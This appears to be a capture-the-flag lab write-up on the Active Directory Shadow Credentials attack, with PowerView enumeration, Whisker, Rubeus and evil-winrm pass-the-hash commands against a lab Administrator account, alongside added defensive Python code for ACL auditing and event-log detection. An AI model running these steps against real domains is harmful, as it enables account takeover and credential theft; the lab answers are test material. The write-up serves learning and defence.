# Day 11

## Learning Objectives

* Understanding Active Directory
* Introduction to Windows Hello for Business
* Prerequisites for exploiting GenericWrite privilege
* How the Shadow Credentials attack works
* How to exploit the vulnerability

## Active Directory 101

Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

This room is straightforward, with all the commands and instructions given to us.

As instructed, we first execute the following commands in PowerShell as part of our enumeration.

{% code overflow="wrap" lineNumbers="true" %}

```powershell
cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.
```

{% endcode %}

We then execute this command.

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
```

{% endcode %}

<figure><img src="/files/Ur9KyxzPt1iAdcS2OVWY" alt=""><figcaption><p>Enumeration gives us user ID</p></figcaption></figure>
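The PowerView command above only asks which rights one principal (`hr`) holds. A defender doing the same review wants the inverse question: which non-privileged principals hold rights over user objects that would let them write `msDS-KeyCredentialLink`. The following is an added example (not part of the original writeup or of PowerView) that runs that audit offline over an ACL export. The CSV, the principal names and the allowlist are constructed; the column names mirror what `Find-InterestingDomainAcl -ResolveGuids` prints, and the attribute name `ms-DS-Key-Credential-Link` is the resolved schema display name assumed here.

```python
"""Offline audit of an AD ACL export for principals that could write
msDS-KeyCredentialLink, the attribute abused by the Shadow Credentials technique.

Added example, not part of the original writeup. The sample records are
constructed to mimic the columns the PowerView command on this page returns
(IdentityReferenceName, ObjectDN, ActiveDirectoryRights, ObjectAceType)."""

import csv
import io

# Constructed sample export. DNs are quoted because they contain commas.
SAMPLE_ACL_CSV = """IdentityReferenceName,ObjectDN,ActiveDirectoryRights,ObjectAceType
Domain Admins,"CN=Administrator,CN=Users,DC=lab,DC=local",GenericAll,None
hr,"CN=Administrator,CN=Users,DC=lab,DC=local",GenericWrite,None
svc_backup,"CN=jdoe,CN=Users,DC=lab,DC=local",WriteProperty,ms-DS-Key-Credential-Link
helpdesk,"CN=jdoe,CN=Users,DC=lab,DC=local","ReadProperty, WriteProperty",User-Account-Restrictions
auditor,"CN=jdoe,CN=Users,DC=lab,DC=local",ReadProperty,None
"""

# Principals expected to hold broad rights over user objects (constructed allowlist).
PRIVILEGED = frozenset({"Domain Admins", "Enterprise Admins", "SYSTEM"})

# Rights that cover every attribute of the object, including msDS-KeyCredentialLink.
BROAD_WRITE_RIGHTS = frozenset({"GenericAll", "GenericWrite"})
# Resolved schema name assumed for the key credential attribute (hypothetical label).
KEY_CREDENTIAL_ATTR = "ms-DS-Key-Credential-Link"


def ace_allows_key_credential_write(rights: str, object_ace_type: str) -> bool:
    """True if an ACE with these rights lets the holder write msDS-KeyCredentialLink.

    GenericAll/GenericWrite always qualify. WriteProperty qualifies only when it is
    unscoped (ObjectAceType 'None' or empty) or scoped to the key credential attribute;
    WriteProperty on some other attribute does not."""
    rights_set = {r.strip() for r in rights.split(",")}
    if rights_set & BROAD_WRITE_RIGHTS:
        return True
    if "WriteProperty" in rights_set and object_ace_type in ("None", "", KEY_CREDENTIAL_ATTR):
        return True
    return False


def find_shadow_credential_paths(acl_csv: str, privileged=PRIVILEGED):
    """Return (principal, target DN, rights) for every non-privileged principal
    whose ACE would allow a Shadow Credentials write on the target object."""
    findings = []
    for row in csv.DictReader(io.StringIO(acl_csv)):
        if row["IdentityReferenceName"] in privileged:
            continue
        if ace_allows_key_credential_write(row["ActiveDirectoryRights"], row["ObjectAceType"]):
            findings.append((row["IdentityReferenceName"], row["ObjectDN"], row["ActiveDirectoryRights"]))
    return findings


if __name__ == "__main__":
    for principal, target, rights in find_shadow_credential_paths(SAMPLE_ACL_CSV):
        print(f"{principal} can write msDS-KeyCredentialLink on {target} via {rights}")
```

On the constructed export this reports `hr` (GenericWrite on the Administrator object, the situation this room is built around) and `svc_backup` (WriteProperty scoped to the attribute itself), while `helpdesk`'s WriteProperty on a different attribute is not flagged. To feed it real data, export the ACEs with PowerView's `Find-InterestingDomainAcl -ResolveGuids | Export-Csv` and replace the allowlist with the groups that are legitimately privileged in your domain.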

We can now proceed with the exploit.

As instructed, we use the tool Whisker.

Whisker is a C# utility created by Elad Shamir. Using it is straightforward: once we have a vulnerable user, we run Whisker's add command to simulate the enrollment of a malicious device, which updates the target's msDS-KeyCredentialLink attribute.

This task can be accomplished by running the following command:

```powershell
.\Whisker.exe add /target:Administrator
```

In our case, we'll have to replace the `/target` parameter with the one from the enumeration step executed inside our VM.

The tool will conveniently provide the certificate necessary to authenticate as the vulnerable user, together with a command ready to be launched using `Rubeus`.

`Rubeus` is a C# toolset for direct Kerberos interaction and exploitation, developed by SpecterOps. The NTLM hash it recovers lets us perform a pass-the-hash attack.

The next command will be:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>
```

{% endcode %}
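The two steps above leave a distinctive trail on the domain controller: Whisker's write to `msDS-KeyCredentialLink` is logged as Security Event ID 5136 (a directory service object was modified), and the Rubeus `asktgt` step, which authenticates with the planted certificate, is logged as Event ID 4768 (a Kerberos TGT was requested) with a certificate pre-authentication type (PreAuthType 16, PA-PK-AS-REQ). The following added example (not part of the original writeup, Whisker or Rubeus) correlates those two events. The sample events, account names, IP addresses and the `trusted_writers` allowlist are constructed; the field names follow the Security log's event data (`SubjectUserName`, `ObjectDN`, `AttributeLDAPDisplayName`, `TargetUserName`, `PreAuthType`), but the `OperationType` value is written as resolved text rather than the raw `%%` code.

```python
"""Detect a Shadow Credentials sequence from Windows Security events:
a write to msDS-KeyCredentialLink (Event ID 5136) by a principal other than
the account itself, followed within a time window by a Kerberos TGT request
(Event ID 4768) for that account using certificate pre-authentication
(PreAuthType 16, PA-PK-AS-REQ).

Added example, not part of the original writeup. All sample events below
are constructed; field names follow the Security log's event data."""

from datetime import datetime, timedelta

KEY_CREDENTIAL_ATTR = "msds-keycredentiallink"
PKINIT_PREAUTH = "16"  # PA-PK-AS-REQ: certificate-based pre-authentication

# Constructed sample events (times in UTC, ISO 8601).
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2023-12-11T10:00:05", "SubjectUserName": "hr",
     "ObjectDN": "CN=Administrator,CN=Users,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"EventID": 5136, "Time": "2023-12-11T10:01:00", "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=jdoe,CN=Users,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "Value Added"},
    {"EventID": 4768, "Time": "2023-12-11T10:00:40", "TargetUserName": "Administrator",
     "PreAuthType": "16", "IpAddress": "10.10.0.5"},
    {"EventID": 4768, "Time": "2023-12-11T10:02:00", "TargetUserName": "jdoe",
     "PreAuthType": "2", "IpAddress": "10.10.0.9"},
]


def account_from_dn(dn: str) -> str:
    """Leaf CN of a distinguishedName: 'CN=Administrator,CN=Users,...' -> 'Administrator'."""
    leaf = dn.split(",", 1)[0]
    return leaf.split("=", 1)[1] if "=" in leaf else leaf


def key_credential_writes(events):
    """5136 events whose modified attribute is msDS-KeyCredentialLink (case-insensitive)."""
    return [e for e in events
            if e["EventID"] == 5136
            and e.get("AttributeLDAPDisplayName", "").lower() == KEY_CREDENTIAL_ATTR]


def pkinit_tgt_requests(events):
    """4768 events where the TGT was obtained with certificate pre-authentication."""
    return [e for e in events
            if e["EventID"] == 4768 and e.get("PreAuthType") == PKINIT_PREAUTH]


def detect_shadow_credentials(events, window=timedelta(minutes=30), trusted_writers=frozenset()):
    """Return one alert per suspicious key credential write.

    A write by the account itself (the usual Windows Hello for Business enrollment
    pattern) or by an allowlisted writer is ignored. A write by any other principal
    is 'medium'; it becomes 'high' if a PKINIT TGT for the target account follows
    within the window, which is exactly the Whisker-then-Rubeus sequence."""
    alerts = []
    tgts = pkinit_tgt_requests(events)
    for w in key_credential_writes(events):
        target = account_from_dn(w["ObjectDN"])
        writer = w["SubjectUserName"]
        if writer.lower() == target.lower() or writer in trusted_writers:
            continue
        t0 = datetime.fromisoformat(w["Time"])
        followups = [t for t in tgts
                     if t["TargetUserName"].lower() == target.lower()
                     and t0 <= datetime.fromisoformat(t["Time"]) <= t0 + window]
        alerts.append({
            "target": target,
            "written_by": writer,
            "time": w["Time"],
            "severity": "high" if followups else "medium",
            "pkinit_sources": [t["IpAddress"] for t in followups],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_shadow_credentials(SAMPLE_EVENTS):
        print(alert)
```

On the constructed data this raises a single high-severity alert: `hr` wrote the key credential of `Administrator`, and a certificate-based TGT for `Administrator` was issued 35 seconds later from 10.10.0.5. Two operational caveats: Event ID 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the object's SACL audits attribute writes, so confirm the event exists in your logs before relying on this rule; and if your environment populates `msDS-KeyCredentialLink` through a sync or enrollment service account, put that account in `trusted_writers` rather than loosening the rule.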

This will give us an NTLM hash, which we can use with `Evil-WinRM`, a tool for remotely managing Windows systems that abuses the Windows Remote Management (WinRM) protocol.

```bash
evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'
```

<figure><img src="/files/pRp29sfiKgOX0cMntwAL" alt=""><figcaption><p>Remote Access with evil-WinRM</p></figcaption></figure>

This gives us remote access, and we can proceed with answering the questions.

```
What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output for Rubeus
```

```
What is the content of flag.txt on the Administrator Desktop?
[REDACTED]
```

<figure><img src="/files/BuHOsxinrJ6YLr1kvBAg" alt=""><figcaption><p>Flag found</p></figcaption></figure>

